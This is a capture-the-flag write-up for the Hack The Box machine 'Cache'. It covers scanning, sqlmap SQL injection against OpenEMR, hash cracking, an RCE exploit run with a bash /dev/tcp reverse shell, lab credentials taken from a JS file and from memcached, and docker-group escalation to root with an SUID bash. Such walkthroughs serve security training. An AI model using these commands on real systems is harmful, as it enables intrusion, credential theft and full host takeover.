Skip to content

Latest commit

 

History

History
167 lines (89 loc) · 3.44 KB

README.md

File metadata and controls

167 lines (89 loc) · 3.44 KB
Raw

Cache

nmap -p- --min-rate 10000 10.10.10.188 -Pn

Alt text

After detection of open ports, let's do greater nmap scan for these open ports.

nmap -A -sC -sV -p22,80 10.10.10.188 -Pn

Alt text

I see some stuff on web application that's interesting for me.

Alt text

It means that there can be another application.(Hospital Management System)

That's why I modified '/etc/hosts' file by adding cache.htb and hms.htb domain names.

Alt text

I opened application and it is 'OpenEMR' CMS system. I browsed /portal endpoint

Alt text

Then, I find .pdf file for this CMS system, let's do SQL Injection attack which is error-based.

Alt text

Let's save this request file as .req file and attack via sqlmap tool.

sqlmap -r error.req --level 5 --risk 3 --technique "E"

Alt text

Let's enumerate databases by adding --dbs option.

Enumerate tables of specific database -D openemr --tables.

I select table name called 'users_secure', let's add to sqlmap cmdlet by adding these options -T users_secure --dump

Final SQLMAP cmdlet.

sqlmap -r error.req --level 5 --risk 3 --technique "E" -D 'openemr' -T 'users_secure' --dump

Alt text

Now, it's time to crack this hash via hashcat tool.

hashcat -m 3200 hash.txt --wordlist /usr/share/wordlists/rockyou.txt

Alt text

I find authenticated RCE exploit from this repository

Let's use this exploit (45161).

openemr_admin: xxxxxx

python2 45161.py -u openemr_admin -p xxxxxx -c 'bash -c "bash -i >& /dev/tcp/10.10.14.5/1337 0>&1"' http://hms.htb

Alt text

I got reverse shell from port (1337).

Alt text

Let's make interactive shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
export SHELL=bash

Alt text

I got password of ash user on endpoint /jquery 's directory for file called 'functionality.js'.

Alt text

ash: H@v3_fun

user.txt

Alt text

While I run netstat -tnpl command see that port 11211 is open.

Alt text

That's belong to 'memchaced', let's connect here via telnet.

telnet 127.0.0.1 11211

I got credentials from here get user and get passwd.

Alt text

luffy: 0n3_p1ec3

I just ssh into machine via this credentials.

I run id command for privilege escalation to know user luffy.

Alt text

docker group can be exploited , also I found predefined docker image via docker image ls command.

Alt text

I just looked at exploit on Gtfobins.

That's Ubuntu image, let's run this to gain root shell

docker run -v /:/mnt -i -t ubuntu bash

Alt text

Reminder! We can gain root shell by copying /bin/bash then give SUID privilege and run via luffy user.

cp bin/bash home/luffy/dr4ks
chmod 4777 home/luffy/dr4ks
exit # to get luffy user
./dr4ks -p # to gain shell

root.txt

Alt text